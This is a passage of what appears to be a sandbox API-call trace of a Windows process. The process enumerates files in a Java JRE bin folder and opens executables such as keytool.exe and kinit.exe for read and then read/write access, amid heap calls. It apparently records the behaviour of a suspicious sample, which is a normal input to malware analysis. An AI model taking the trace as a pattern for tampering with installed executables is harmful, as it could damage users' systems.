ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x35e40)) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0093.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.231] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="keytool.exe", cAlternateFileName="")) returned 1 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0093.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.232] AreFileApisANSI () returned 1 [0093.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe", lpUsedDefaultChar=0x0) returned 51 [0093.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0093.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.232] AreFileApisANSI () returned 1 [0093.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0093.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46198 [0093.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46198, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 51 [0093.232] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.233] GetFileType (hFile=0x360) returned 0x1 [0093.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0093.233] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.233] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.233] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.233] CloseHandle (hObject=0x360) returned 1 [0093.234] AreFileApisANSI () returned 1 [0093.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x466d8 [0093.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 51 [0093.234] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.234] GetFileType (hFile=0x360) returned 0x1 [0093.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0093.234] CloseHandle (hObject=0x360) returned 1 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.235] AreFileApisANSI () returned 1 [0093.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46358 [0093.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 51 [0093.235] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0093.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.235] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="kinit.exe", cAlternateFileName="")) returned 1 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0093.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69e30 [0093.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0093.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0093.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0093.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0093.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.236] AreFileApisANSI () returned 1 [0093.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe", lpUsedDefaultChar=0x0) returned 49 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0093.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.236] AreFileApisANSI () returned 1 [0093.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0093.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x464a8 [0093.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x464a8, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 49 [0093.237] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.237] GetFileType (hFile=0x360) returned 0x1 [0093.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0093.237] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.237] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.237] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.237] CloseHandle (hObject=0x360) returned 1 [0093.238] AreFileApisANSI () returned 1 [0093.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46908 [0093.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 49 [0093.238] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.238] GetFileType (hFile=0x360) returned 0x1 [0093.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0093.238] CloseHandle (hObject=0x360) returned 1 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.239] AreFileApisANSI () returned 1 [0093.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46748 [0093.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 49 [0093.239] GetFileAttributesExW 